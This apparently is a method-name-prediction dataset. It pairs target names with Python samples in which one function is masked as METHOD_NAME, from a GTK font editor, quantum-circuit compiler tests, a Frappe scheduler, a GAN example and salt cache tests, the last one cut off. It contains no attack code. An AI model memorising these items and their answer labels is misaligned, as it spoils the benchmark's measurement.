return self.builder.get_object('editor')
def on_export_clicked(self, w: Gtk.MenuToolButton):
dialog = Gtk.FileChooserNative.new(
_("Export font in folder..."),
MainController.window(),
Gtk.FileChooserAction.SELECT_FOLDER,
_('_Save'), None
)
response = dialog.run()
fn = dialog.get_filename()
dialog.destroy()
if response == Gtk.ResponseType.ACCEPT:
assert self.font
for i in range(self.font.get_nb_entries()):
e = self.font.get_entry(i)
if e:
path = os.path.join(fn, f'{i:0>4}.png')
e.save(path)
def on_import_clicked(self, w: Gtk.MenuToolButton):
md = SkyTempleMessageDialog(
MainController.window(),
Gtk.DialogFlags.DESTROY_WITH_PARENT, Gtk.MessageType.INFO,
Gtk.ButtonsType.OK,
_("To import, select a folder containing all the files that were created when exporting the font.\n"
"IMPORTANT: All image files must be indexed PNGs and use the same palette!"),
title=_("Import Font")
)
md.run()
md.destroy()
fdialog = Gtk.FileChooserNative.new(
_("Import font from folder..."),
MainController.window(),
Gtk.FileChooserAction.SELECT_FOLDER,
None, None
)
response = fdialog.run()
fn = fdialog.get_filename()
fdialog.destroy()
if response == Gtk.ResponseType.ACCEPT:
assert self.builder
dialog: Gtk.Dialog = self.builder.get_object('dialog_import')
self.builder.get_object('nb_entries_import').set_increments(1,1)
self.builder.get_object('nb_entries_import').set_range(1, MAX_ENTRIES-1)
self.builder.get_object('nb_entries_import').set_text(str(self.font.get_nb_entries())) # type: ignore
dialog.set_attached_to(MainController.window())
dialog.set_transient_for(MainController.window())
resp = dialog.run()
dialog.hide()
if resp == Gtk.ResponseType.OK:
try:
lst_entries: List[Optional[Image.Image]] = []
for i in range(int(self.builder.get_object('nb_entries_import').get_text())):
path = os.path.join(fn, f'{i:0>4}.png')
if os.path.exists(path):
lst_entries.append(Image.open(path, 'r'))
else:
lst_entries.append(None)
self.font.set_entries(lst_entries) # type: ignore
self.module.mark_font_as_modified(self.spec)
except Exception as err:
display_error(
sys.exc_info(),
str(err),
_("Error importing font.")
)
self._init_font()
def _init_font(self):
self.builder.get_object('entry_id').set_text(str(0))
self.builder.get_object('entry_id').set_increments(1,1)
self.builder.get_object('entry_id').set_range(0, self.font.get_nb_entries()-1)
self._switch_entry()
def on_entry_id_changed(self, widget):
try:
val = int(widget.get_text())
except ValueError:
val = -1
if val<0:
val = 0
widget.set_text(str(val))
elif val>=self.font.get_nb_entries():
val=self.font.get_nb_entries()-1
widget.set_text(str(val))
self._switch_entry()
def on_nb_entries_import_changed(self, widget):
try:
val = int(widget.get_text())
except ValueError:
val = -1
if val<=0:
val = 1
widget.set_text(str(val))
elif val>=MAX_ENTRIES+1:
val=MAX_ENTRIES
widget.set_text(str(val))
def _switch_entry(self):
surface = self.font.get_entry(int(self.builder.get_object('entry_id').get_text()))
stack: Gtk.Stack = self.builder.get_object('entry_stack')
if surface:
stack.set_visible_child(self.builder.get_object('entry_viewer'))
surface = surface.resize((surface.width*IMAGE_ZOOM, surface.height*IMAGE_ZOOM))
self.surface = pil_to_cairo_surface(surface.convert('RGBA'))
self.builder.get_object('draw').queue_draw()
else:
stack.set_visible_child(self.builder.get_object('no_entry_label'))
self.surface = pil_to_cairo_surface(Image.new('RGBA', size=(1,1)))
def draw(self, wdg, ctx: cairo.Context, *args):
if self.surface:
wdg.set_size_request(self.surface.get_width(), self.surface.get_height())
ctx.fill()
ctx.set_source_surface(self.surface, 0, 0)
ctx.get_source().set_filter(cairo.Filter.NEAREST)
ctx.paint()
return True | null |
test compiling gates different sampling number | import pytest
import numpy as np
from numpy.testing import assert_array_equal
from scipy import integrate
from qutip_qip.compiler.gatecompiler import _default_window_t_max
from qutip_qip.device import (
DispersiveCavityQED, CircularSpinChain, LinearSpinChain)
from qutip_qip.compiler import (
SpinChainCompiler, CavityQEDCompiler, Instruction, GateCompiler
)
from qutip_qip.circuit import QubitCircuit
from qutip import basis, fidelity
def test_compiling_with_scheduler():
"""
    Here we test whether compiling with the scheduler works properly.
    The non-scheduled pulse should be twice as long as the scheduled one.
The numerical results are tested in test_device.py
"""
circuit = QubitCircuit(2)
circuit.add_gate("X", 0)
circuit.add_gate("X", 1)
processor = DispersiveCavityQED(2)
processor.load_circuit(circuit, schedule_mode=None)
tlist = processor.get_full_tlist()
time_not_scheduled = tlist[-1]-tlist[0]
processor.load_circuit(circuit, schedule_mode="ASAP")
tlist = processor.get_full_tlist()
time_scheduled1 = tlist[-1]-tlist[0]
processor.load_circuit(circuit, schedule_mode="ALAP")
tlist = processor.get_full_tlist()
time_scheduled2 = tlist[-1]-tlist[0]
assert(abs(time_scheduled1 * 2 - time_not_scheduled) < 1.0e-10)
assert(abs(time_scheduled2 * 2 - time_not_scheduled) < 1.0e-10)
def METHOD_NAME():
"""
    Define a compiler without a physical model.
    Test compiling gates to pulses with different sampling numbers.
"""
class MockCompiler(GateCompiler):
def __init__(self, num_qubits, params=None):
super().__init__(num_qubits, params=params)
self.gate_compiler["U1"] = self.single_qubit_gate_compiler
self.gate_compiler["U2"] = self.two_qubit_gate_compiler
self.args.update({"params": params})
def single_qubit_gate_compiler(self, gate, args):
pulse_info = [("x", np.array([1.0] * 3))]
return [
Instruction(
gate, tlist=np.linspace(0, 2, 3), pulse_info=pulse_info
)
]
def two_qubit_gate_compiler(self, gate, args):
pulse_info = [("xx", np.array([2.0] * 5))]
return [
Instruction(
gate, tlist=np.linspace(0, 4, 5), pulse_info=pulse_info
)
]
num_qubits = 2
circuit = QubitCircuit(num_qubits)
circuit.add_gate("U1", targets=0, arg_value=1.0)
circuit.add_gate("U2", targets=[0, 1], arg_value=1.0)
circuit.add_gate("U1", targets=0, arg_value=1.0)
compiler = MockCompiler(num_qubits=2)
compiled_tlists, compiled_coeffs = compiler.compile(circuit)
# Filter out the nonzero part of the pulse
# and check if they are correct.
np.testing.assert_array_equal(
compiled_tlists["x"][np.nonzero(compiled_coeffs["x"])[0]],
np.array([1, 2, 7, 8]),
)
np.testing.assert_array_equal(
compiled_tlists["xx"][np.nonzero(compiled_coeffs["xx"])[0]],
np.array([3, 4, 5, 6]),
)
# Test the compiler with a physical model.
class MyCompiler(GateCompiler): # compiler class
def __init__(self, num_qubits, params):
super(MyCompiler, self).__init__(num_qubits, params=params)
# pass our compiler function as a compiler for RX (rotation around X) gate.
self.gate_compiler["RX"] = self.rx_compiler
self.args.update({"params": params})
def rx_compiler(self, gate, args):
targets = gate.targets
coeff, tlist = self.generate_pulse_shape(
"hann",
1000,
maximum=args["params"]["sx"][targets[0]],
# The operator is Pauli Z/X/Y, without 1/2.
area=gate.arg_value / 2.0 / np.pi * 0.5,
)
pulse_info = [("sx" + str(targets[0]), coeff)]
return [Instruction(gate, tlist, pulse_info)]
spline_kind = [
pytest.param("step_func", id = "discrete"),
pytest.param("cubic", id = "continuos"),
]
schedule_mode = [
pytest.param("ASAP", id = "ASAP"),
pytest.param("ALAP", id="ALAP"),
pytest.param(False, id = "No schedule"),
]
@pytest.mark.parametrize("spline_kind", spline_kind)
@pytest.mark.parametrize("schedule_mode", schedule_mode)
def test_compiler_with_continous_pulse(spline_kind, schedule_mode):
num_qubits = 2
circuit = QubitCircuit(num_qubits)
circuit.add_gate("X", targets=0)
circuit.add_gate("X", targets=1)
circuit.add_gate("X", targets=0)
processor = CircularSpinChain(num_qubits)
processor.spline_kind = spline_kind
gauss_compiler = MyCompiler(num_qubits, processor.params)
processor.load_circuit(
circuit, schedule_mode = schedule_mode, compiler=gauss_compiler)
result = processor.run_state(init_state = basis([2,2], [0,0]))
assert(abs(fidelity(result.states[-1],basis([2,2],[0,1])) - 1) < 1.e-5)
def rx_compiler_without_pulse_dict(gate, args):
"""
Define a gate compiler that does not use pulse_dict but directly
    gives the index of control pulses in the Processor.
"""
targets = gate.targets
g = args["params"]["sx"][targets[0]]
coeff = np.sign(gate.arg_value) * g
tlist = abs(gate.arg_value) / (2 * g) / np.pi/ 2
pulse_info = [(targets[0], coeff)]
return [Instruction(gate, tlist, pulse_info)]
def test_compiler_without_pulse_dict():
"""
Test for a compiler function without pulse_dict and using args.
"""
num_qubits = 2
circuit = QubitCircuit(num_qubits)
circuit.add_gate("X", targets=[0])
circuit.add_gate("X", targets=[1])
processor = CircularSpinChain(num_qubits)
compiler = SpinChainCompiler(num_qubits, params=processor.params, setup="circular")
compiler.gate_compiler["RX"] = rx_compiler_without_pulse_dict
compiler.args = {"params": processor.params}
processor.load_circuit(circuit, compiler=compiler)
result = processor.run_state(basis([2,2], [0,0]))
assert(abs(fidelity(result.states[-1], basis([2,2], [1,1])) - 1.) < 1.e-6 )
def test_compiler_result_format():
"""
Test if compiler return correctly different kind of compiler result
and if processor can successfully read them.
"""
num_qubits = 1
circuit = QubitCircuit(num_qubits)
circuit.add_gate("RX", targets=[0], arg_value=np.pi/2)
processor = LinearSpinChain(num_qubits)
compiler = SpinChainCompiler(num_qubits, params=processor.params, setup="circular")
tlist, coeffs = compiler.compile(circuit)
assert(isinstance(tlist, dict))
assert("sx0" in tlist)
assert(isinstance(coeffs, dict))
assert("sx0" in coeffs)
processor.coeffs = coeffs
processor.set_all_tlist(tlist)
assert_array_equal(processor.pulses[0].coeff, coeffs["sx0"])
assert_array_equal(processor.pulses[0].tlist, tlist["sx0"])
compiler.gate_compiler["RX"] = rx_compiler_without_pulse_dict
tlist, coeffs = compiler.compile(circuit)
assert(isinstance(tlist, dict))
assert(0 in tlist)
assert(isinstance(coeffs, dict))
assert(0 in coeffs)
processor.coeffs = coeffs
processor.set_all_tlist(tlist)
assert_array_equal(processor.pulses[0].coeff, coeffs[0])
assert_array_equal(processor.pulses[0].tlist, tlist[0])
@pytest.mark.parametrize(
"shape", list(_default_window_t_max.keys()))
def test_pulse_shape(shape):
"""Test different pulse shape functions"""
coeff, tlist = GateCompiler.generate_pulse_shape(
shape, 1001, maximum=1.0, area=1.0)
assert pytest.approx(coeff[500], 1.e-2) == 1 # max
result = integrate.trapz(coeff, tlist)
assert pytest.approx(result, rel=1.e-2) == 1 # area | null |
get raw point | import unittest
from unittest.mock import patch
import numpy as np
import xarray as xr
from data.calculated import CalculatedArray, CalculatedData
from data.variable import Variable
from data.variable_list import VariableList
class TestCalculatedData(unittest.TestCase):
@patch("data.sqlite_database.SQLiteDatabase.get_data_variables")
def test_nothing(self, mock_query_func):
mock_query_func.return_value = VariableList(
[
Variable(
"votemper",
"Sea water potential temperature",
"Kelvin",
sorted(["time", "depth", "latitude", "longitude"]),
)
]
)
with CalculatedImpl("tests/testdata/mercator_test.nc") as data:
self.assertEqual(len(data.variables), 1)
v = data.get_dataset_variable("votemper")
self.assertEqual(xr.DataArray, type(v))
self.assertAlmostEqual(v[0, 0, 17, 816].values, 271.1796875)
@patch("data.sqlite_database.SQLiteDatabase.get_data_variables")
@patch("data.sqlite_database.SQLiteDatabase.get_variable_dims")
def test_new_variable(self, mock_get_var_dims, mock_query_func):
mock_get_var_dims.return_value = ["time", "depth", "latitude", "longitude"]
mock_query_func.return_value = VariableList(
[
Variable(
"votemper",
"Sea water potential temperature",
"Kelvin",
sorted(["time", "depth", "latitude", "longitude"]),
)
]
)
calculated = {
"votemper_new": {
"equation": "votemper * 2",
"long_name": "Temperature",
"dims": ("time", "depth", "latitude", "longitude"),
"units": "degree_C",
"valid_min": -273.15,
"valid_max": 999.0,
}
}
with CalculatedImpl(
"tests/testdata/mercator_test.nc", calculated=calculated
) as data:
self.assertEqual(len(data.variables), 2)
v = data.get_dataset_variable("votemper_new")
self.assertAlmostEqual(v[0, 0, 17, 816].values, 2.0 * 271.1796875)
self.assertEqual(v.attrs.long_name, "Temperature")
self.assertEqual(v.shape, (1, 50, 850, 1800))
@patch("data.sqlite_database.SQLiteDatabase.get_data_variables")
def test_override(self, mock_query_func):
mock_query_func.return_value = VariableList(
[
Variable(
"votemper",
"Sea water potential temperature",
"Kelvin",
sorted(["time", "depth", "latitude", "longitude"]),
)
]
)
calculated = {
"votemper": {
"equation": "votemper -273.15",
"units": "degree_C",
"dims": ("time", "depth", "latitude", "longitude"),
}
}
with CalculatedImpl(
"tests/testdata/mercator_test.nc", calculated=calculated
) as data:
self.assertEqual(len(data.variables), 1)
v = data.get_dataset_variable("votemper")
self.assertAlmostEqual(v[0, 0, 17, 816].values, 271.1796875 - 273.15)
self.assertEqual(v.attrs.long_name, "Sea water potential temperature")
self.assertEqual(v.shape, (1, 50, 850, 1800))
def test_calculated_var_wo_dims_raises(self):
calculated = {
"votemper": {
"equation": "votemper -273.15",
"units": "degree_C",
}
}
with CalculatedImpl(
"tests/testdata/mercator_test.nc", calculated=calculated
) as data:
with self.assertRaises(KeyError):
data.get_dataset_variable("votemper")
class CalculatedImpl(CalculatedData):
def __init__(self, url: str, **kwargs):
super().__init__(url, **kwargs)
def get_point(self):
pass
def get_profile(self):
pass
def METHOD_NAME(self):
pass
def depths(self):
pass
class TestCalculatedArray(unittest.TestCase):
def test_attrs(self):
attrs = {"my_attr": 420}
dataset = xr.Dataset()
array = CalculatedArray(dataset, "3 * 5", [], attrs)
self.assertEqual(array[:].attrs, attrs)
self.assertEqual(array.attrs, attrs)
def test_static(self):
dataset = xr.Dataset()
array = CalculatedArray(dataset, "3 * 5", [])
self.assertEqual(array[0], 15)
def test_passthrough(self):
dataset = xr.Dataset({"var": ("x", [1, 2, 3, 4, 5])})
array = CalculatedArray(dataset, "var", ["x"])
self.assertEqual(array[0], 1)
self.assertEqual(array[2], 3)
self.assertEqual(array[4], 5)
def test_single_expression(self):
dataset = xr.Dataset({"var": ("x", [1, 2, 3, 4, 5])})
array = CalculatedArray(dataset, "var * 5", ["x"])
self.assertEqual(array[0], 5)
self.assertEqual(array[2], 15)
self.assertEqual(array[4], 25)
def test_multiple_expression(self):
dataset = xr.Dataset(
{
"var": ("x", [1, 2, 3, 4, 5]),
"var2": ("x", [5, 4, 3, 2, 1]),
}
)
array = CalculatedArray(dataset, "var + var2", ["x"])
self.assertEqual(array[0], 6)
self.assertEqual(array[2], 6)
self.assertEqual(array[4], 6)
def test_different_dimensions(self):
dataset = xr.Dataset(
{
"var": ("x", [1, 2]),
"var2": ("y", [3, 4]),
"var3": (("x", "y"), [[5, 6], [7, 8]]),
"var4": (("y", "x"), [[9, 10], [11, 12]]),
}
)
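# Mixing variables with incompatible dimensions should evaluate to NaN.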
array = CalculatedArray(dataset, "var + var2", ["x"])
self.assertIsNan(array[0])
array = CalculatedArray(dataset, "var3 + var4", ["x"])
self.assertIsNan(array[0, 0])
array = CalculatedArray(dataset, "var + var3", ["x", "y"])
self.assertEqual(array[0, 0], 6)
self.assertEqual(array[0, 1], 7)
self.assertEqual(array[1, 0], 9)
self.assertEqual(array[1, 1], 10)
def assertIsNan(self, value):
v = value
return self.assertTrue(np.isnan(v)) | null |
enqueue events for all sites | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: MIT. See LICENSE
"""
Events:
always
daily
monthly
weekly
"""
# imports - standard imports
import os
import random
import time
from typing import NoReturn
# imports - module imports
import frappe
from frappe.utils import cint, get_datetime, get_sites, now_datetime
from frappe.utils.background_jobs import set_niceness
DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
def cprint(*args, **kwargs):
"""Prints only if called from STDOUT"""
try:
os.get_terminal_size()
print(*args, **kwargs)
except Exception:
pass
def start_scheduler() -> NoReturn:
"""Run enqueue_events_for_all_sites based on scheduler tick.
Specify scheduler_tick_interval in seconds in common_site_config.json"""
tick = cint(frappe.get_conf().scheduler_tick_interval) or 60
set_niceness()
while True:
time.sleep(tick)
METHOD_NAME()
def METHOD_NAME() -> None:
"""Loop through sites and enqueue events that are not already queued"""
if os.path.exists(os.path.join(".", ".restarting")):
# Don't add task to queue if webserver is in restart mode
return
with frappe.init_site():
sites = get_sites()
# Sites are sorted in alphabetical order, shuffle to randomize priorities
random.shuffle(sites)
for site in sites:
try:
enqueue_events_for_site(site=site)
except Exception:
frappe.logger("scheduler").debug(f"Failed to enqueue events for site: {site}", exc_info=True)
def enqueue_events_for_site(site: str) -> None:
def log_exc():
frappe.logger("scheduler").error(f"Exception in Enqueue Events for Site {site}", exc_info=True)
try:
frappe.init(site=site)
frappe.connect()
if is_scheduler_inactive():
return
enqueue_events(site=site)
frappe.logger("scheduler").debug(f"Queued events for site {site}")
except Exception as e:
if frappe.db.is_access_denied(e):
frappe.logger("scheduler").debug(f"Access denied for site {site}")
log_exc()
finally:
frappe.destroy()
def enqueue_events(site: str) -> list[str] | None:
if schedule_jobs_based_on_activity():
enqueued_jobs = []
for job_type in frappe.get_all("Scheduled Job Type", filters={"stopped": 0}, fields="*"):
job_type = frappe.get_doc(doctype="Scheduled Job Type", **job_type)
if job_type.enqueue():
enqueued_jobs.append(job_type.method)
return enqueued_jobs
def is_scheduler_inactive(verbose=True) -> bool:
if frappe.local.conf.maintenance_mode:
if verbose:
cprint(f"{frappe.local.site}: Maintenance mode is ON")
return True
if frappe.local.conf.pause_scheduler:
if verbose:
cprint(f"{frappe.local.site}: frappe.conf.pause_scheduler is SET")
return True
if is_scheduler_disabled(verbose=verbose):
return True
return False
def is_scheduler_disabled(verbose=True) -> bool:
if frappe.conf.disable_scheduler:
if verbose:
cprint(f"{frappe.local.site}: frappe.conf.disable_scheduler is SET")
return True
scheduler_disabled = not frappe.utils.cint(
frappe.db.get_single_value("System Settings", "enable_scheduler")
)
if scheduler_disabled:
if verbose:
cprint(f"{frappe.local.site}: SystemSettings.enable_scheduler is UNSET")
return scheduler_disabled
def toggle_scheduler(enable):
frappe.db.set_single_value("System Settings", "enable_scheduler", int(enable))
def enable_scheduler():
toggle_scheduler(True)
def disable_scheduler():
toggle_scheduler(False)
def schedule_jobs_based_on_activity(check_time=None):
"""Returns True for active sites defined by Activity Log
Returns True for inactive sites once in 24 hours"""
if is_dormant(check_time=check_time):
# ensure last job is one day old
last_job_timestamp = _get_last_modified_timestamp("Scheduled Job Log")
if not last_job_timestamp:
return True
else:
if ((check_time or now_datetime()) - last_job_timestamp).total_seconds() >= 86400:
# one day has passed since jobs were run, so let's do this
return True
else:
# scheduler has run within the last 24 hours, do nothing
return False
else:
# site is active, let's run the jobs
return True
def is_dormant(check_time=None):
last_activity_log_timestamp = _get_last_modified_timestamp("Activity Log")
since = (frappe.get_system_settings("dormant_days") or 4) * 86400
if not last_activity_log_timestamp:
return True
if ((check_time or now_datetime()) - last_activity_log_timestamp).total_seconds() >= since:
return True
return False
def _get_last_modified_timestamp(doctype):
timestamp = frappe.db.get_value(
doctype, filters={}, fieldname="modified", order_by="modified desc"
)
if timestamp:
return get_datetime(timestamp)
@frappe.whitelist()
def activate_scheduler():
from frappe.installer import update_site_config
frappe.only_for("Administrator")
if frappe.local.conf.maintenance_mode:
frappe.throw(frappe._("Scheduler can not be re-enabled when maintenance mode is active."))
if is_scheduler_disabled():
enable_scheduler()
if frappe.conf.pause_scheduler:
update_site_config("pause_scheduler", 0)
@frappe.whitelist()
def get_scheduler_status():
if is_scheduler_inactive():
return {"status": "inactive"}
return {"status": "active"} | null |
block | # Copyright The Lightning AI team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""To run this template just do: python generative_adversarial_net.py.
After a few epochs, launch TensorBoard to see the images being generated at every batch:
tensorboard --logdir default
"""
from argparse import ArgumentParser, Namespace
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from lightning.pytorch import cli_lightning_logo
from lightning.pytorch.core import LightningModule
from lightning.pytorch.demos.mnist_datamodule import MNISTDataModule
from lightning.pytorch.trainer import Trainer
from lightning.pytorch.utilities.imports import _TORCHVISION_AVAILABLE
if _TORCHVISION_AVAILABLE:
import torchvision
class Generator(nn.Module):
"""
>>> Generator(img_shape=(1, 8, 8)) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
Generator(
(model): Sequential(...)
)
"""
def __init__(self, latent_dim: int = 100, img_shape: tuple = (1, 28, 28)):
super().__init__()
self.img_shape = img_shape
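# Helper producing one Linear -> (optional BatchNorm1d) -> LeakyReLU block of the MLP.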
def METHOD_NAME(in_feat, out_feat, normalize=True):
layers = [nn.Linear(in_feat, out_feat)]
if normalize:
layers.append(nn.BatchNorm1d(out_feat, 0.8))
layers.append(nn.LeakyReLU(0.2, inplace=True))
return layers
self.model = nn.Sequential(
*METHOD_NAME(latent_dim, 128, normalize=False),
*METHOD_NAME(128, 256),
*METHOD_NAME(256, 512),
*METHOD_NAME(512, 1024),
nn.Linear(1024, int(np.prod(img_shape))),
nn.Tanh(),
)
def forward(self, z):
img = self.model(z)
return img.view(img.size(0), *self.img_shape)
class Discriminator(nn.Module):
"""
>>> Discriminator(img_shape=(1, 28, 28)) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
Discriminator(
(model): Sequential(...)
)
"""
def __init__(self, img_shape):
super().__init__()
self.model = nn.Sequential(
nn.Linear(int(np.prod(img_shape)), 512),
nn.LeakyReLU(0.2, inplace=True),
nn.Linear(512, 256),
nn.LeakyReLU(0.2, inplace=True),
nn.Linear(256, 1),
)
def forward(self, img):
img_flat = img.view(img.size(0), -1)
return self.model(img_flat)
class GAN(LightningModule):
"""
>>> GAN(img_shape=(1, 8, 8)) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
GAN(
(generator): Generator(
(model): Sequential(...)
)
(discriminator): Discriminator(
(model): Sequential(...)
)
)
"""
def __init__(
self,
img_shape: tuple = (1, 28, 28),
lr: float = 0.0002,
b1: float = 0.5,
b2: float = 0.999,
latent_dim: int = 100,
):
super().__init__()
self.save_hyperparameters()
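# Generator and discriminator optimizers are stepped by hand in training_step.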
self.automatic_optimization = False
# networks
self.generator = Generator(latent_dim=self.hparams.latent_dim, img_shape=img_shape)
self.discriminator = Discriminator(img_shape=img_shape)
self.validation_z = torch.randn(8, self.hparams.latent_dim)
self.example_input_array = torch.zeros(2, self.hparams.latent_dim)
def forward(self, z):
return self.generator(z)
@staticmethod
def adversarial_loss(y_hat, y):
return F.binary_cross_entropy_with_logits(y_hat, y)
def training_step(self, batch):
imgs, _ = batch
opt_g, opt_d = self.optimizers()
# sample noise
z = torch.randn(imgs.shape[0], self.hparams.latent_dim)
z = z.type_as(imgs)
# Train generator
# ground truth result (ie: all fake)
# put on GPU because we created this tensor inside training_loop
valid = torch.ones(imgs.size(0), 1)
valid = valid.type_as(imgs)
self.toggle_optimizer(opt_g)
# adversarial loss is binary cross-entropy
g_loss = self.adversarial_loss(self.discriminator(self(z)), valid)
opt_g.zero_grad()
self.manual_backward(g_loss)
opt_g.step()
self.untoggle_optimizer(opt_g)
# Train discriminator
# Measure discriminator's ability to classify real from generated samples
# how well can it label as real?
valid = torch.ones(imgs.size(0), 1)
valid = valid.type_as(imgs)
self.toggle_optimizer(opt_d)
real_loss = self.adversarial_loss(self.discriminator(imgs), valid)
# how well can it label as fake?
fake = torch.zeros(imgs.size(0), 1)
fake = fake.type_as(imgs)
fake_loss = self.adversarial_loss(self.discriminator(self(z).detach()), fake)
# discriminator loss is the average of these
d_loss = (real_loss + fake_loss) / 2
opt_d.zero_grad()
self.manual_backward(d_loss)
opt_d.step()
self.untoggle_optimizer(opt_d)
self.log_dict({"d_loss": d_loss, "g_loss": g_loss})
def configure_optimizers(self):
lr = self.hparams.lr
b1 = self.hparams.b1
b2 = self.hparams.b2
opt_g = torch.optim.Adam(self.generator.parameters(), lr=lr, betas=(b1, b2))
opt_d = torch.optim.Adam(self.discriminator.parameters(), lr=lr, betas=(b1, b2))
return opt_g, opt_d
def on_train_epoch_end(self):
z = self.validation_z.type_as(self.generator.model[0].weight)
# log sampled images
sample_imgs = self(z)
grid = torchvision.utils.make_grid(sample_imgs)
for logger in self.loggers:
logger.experiment.add_image("generated_images", grid, self.current_epoch)
def main(args: Namespace) -> None:
# ------------------------
# 1 INIT LIGHTNING MODEL
# ------------------------
model = GAN(lr=args.lr, b1=args.b1, b2=args.b2, latent_dim=args.latent_dim)
# ------------------------
# 2 INIT TRAINER
# ------------------------
# If using distributed training, PyTorch recommends DistributedDataParallel.
# See: https://pytorch.org/docs/stable/nn.html#torch.nn.DataParallel
dm = MNISTDataModule()
trainer = Trainer(accelerator="gpu", devices=1)
# ------------------------
# 3 START TRAINING
# ------------------------
trainer.fit(model, dm)
if __name__ == "__main__":
cli_lightning_logo()
parser = ArgumentParser()
# Hyperparameters
parser.add_argument("--lr", type=float, default=0.0002, help="adam: learning rate")
parser.add_argument("--b1", type=float, default=0.5, help="adam: decay of first order momentum of gradient")
parser.add_argument("--b2", type=float, default=0.999, help="adam: decay of second order momentum of gradient")
parser.add_argument("--latent_dim", type=int, default=100, help="dimensionality of the latent space")
args = parser.parse_args()
main(args) | null |
test removing twice | from datetime import datetime
from unittest.mock import patch
import pytest
from szurubooru import api, db, errors, model
from szurubooru.func import posts
@pytest.fixture(autouse=True)
def inject_config(config_injector):
config_injector(
{"privileges": {"posts:favorite": model.User.RANK_REGULAR}}
)
def test_adding_to_favorites(
user_factory, post_factory, context_factory, fake_datetime
):
post = post_factory()
db.session.add(post)
db.session.commit()
assert post.score == 0
with patch("szurubooru.func.posts.serialize_post"), fake_datetime(
"1997-12-01"
):
posts.serialize_post.return_value = "serialized post"
result = api.post_api.add_post_to_favorites(
context_factory(user=user_factory()), {"post_id": post.post_id}
)
assert result == "serialized post"
post = db.session.query(model.Post).one()
assert db.session.query(model.PostFavorite).count() == 1
assert post is not None
assert post.favorite_count == 1
assert post.score == 1
def test_removing_from_favorites(
user_factory, post_factory, context_factory, fake_datetime
):
user = user_factory()
post = post_factory()
db.session.add(post)
db.session.commit()
assert post.score == 0
with patch("szurubooru.func.posts.serialize_post"):
with fake_datetime("1997-12-01"):
api.post_api.add_post_to_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
assert post.score == 1
with fake_datetime("1997-12-02"):
api.post_api.delete_post_from_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
post = db.session.query(model.Post).one()
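# The score gained when the post was favorited is kept even after the favorite is removed.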
assert post.score == 1
assert db.session.query(model.PostFavorite).count() == 0
assert post.favorite_count == 0
def test_favoriting_twice(
user_factory, post_factory, context_factory, fake_datetime
):
user = user_factory()
post = post_factory()
db.session.add(post)
db.session.commit()
with patch("szurubooru.func.posts.serialize_post"):
with fake_datetime("1997-12-01"):
api.post_api.add_post_to_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
with fake_datetime("1997-12-02"):
api.post_api.add_post_to_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
post = db.session.query(model.Post).one()
assert db.session.query(model.PostFavorite).count() == 1
assert post.favorite_count == 1
def METHOD_NAME(
user_factory, post_factory, context_factory, fake_datetime
):
user = user_factory()
post = post_factory()
db.session.add(post)
db.session.commit()
with patch("szurubooru.func.posts.serialize_post"):
with fake_datetime("1997-12-01"):
api.post_api.add_post_to_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
with fake_datetime("1997-12-02"):
api.post_api.delete_post_from_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
with fake_datetime("1997-12-02"):
api.post_api.delete_post_from_favorites(
context_factory(user=user), {"post_id": post.post_id}
)
post = db.session.query(model.Post).one()
assert db.session.query(model.PostFavorite).count() == 0
assert post.favorite_count == 0
def test_favorites_from_multiple_users(
user_factory, post_factory, context_factory, fake_datetime
):
user1 = user_factory()
user2 = user_factory()
post = post_factory()
db.session.add_all([user1, user2, post])
db.session.commit()
with patch("szurubooru.func.posts.serialize_post"):
with fake_datetime("1997-12-01"):
api.post_api.add_post_to_favorites(
context_factory(user=user1), {"post_id": post.post_id}
)
with fake_datetime("1997-12-02"):
api.post_api.add_post_to_favorites(
context_factory(user=user2), {"post_id": post.post_id}
)
post = db.session.query(model.Post).one()
assert db.session.query(model.PostFavorite).count() == 2
assert post.favorite_count == 2
assert post.last_favorite_time == datetime(1997, 12, 2)
def test_trying_to_update_non_existing(user_factory, context_factory):
with pytest.raises(posts.PostNotFoundError):
api.post_api.add_post_to_favorites(
context_factory(user=user_factory()), {"post_id": 5}
)
def test_trying_to_rate_without_privileges(
user_factory, post_factory, context_factory
):
post = post_factory()
db.session.add(post)
db.session.commit()
with pytest.raises(errors.AuthError):
api.post_api.add_post_to_favorites(
context_factory(user=user_factory(rank=model.User.RANK_ANONYMOUS)),
{"post_id": post.post_id},
) | null |
test unicode error | """
tests.unit.utils.cache_test
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Test the salt cache objects
"""
import logging
import pathlib
import time
import pytest
import salt.loader
import salt.payload
import salt.utils.cache as cache
import salt.utils.data
import salt.utils.files
from tests.support.mock import patch
def test_sanity():
"""
Make sure you can instantiate etc.
"""
cd = cache.CacheDict(5)
assert isinstance(cd, cache.CacheDict)
# do some tests to make sure it looks like a dict
assert "foo" not in cd
cd["foo"] = "bar"
assert cd["foo"] == "bar"
del cd["foo"]
assert "foo" not in cd
def test_ttl():
cd = cache.CacheDict(0.1)
cd["foo"] = "bar"
assert "foo" in cd
assert cd["foo"] == "bar"
time.sleep(0.2)
assert "foo" not in cd
# make sure that a get would get a regular old key error
with pytest.raises(KeyError):
cd["foo"] # pylint: disable=pointless-statement
@pytest.fixture
def cache_dir(minion_opts):
return pathlib.Path(minion_opts["cachedir"])
def test_smoke_context(minion_opts):
"""
Smoke test the context cache
"""
context_cache = cache.ContextCache(minion_opts, "cache_test")
data = {"a": "b"}
context_cache.cache_context(data.copy())
ret = context_cache.get_cache_context()
assert ret == data
@pytest.fixture
def cache_mod_name():
return "cache_mod"
@pytest.fixture
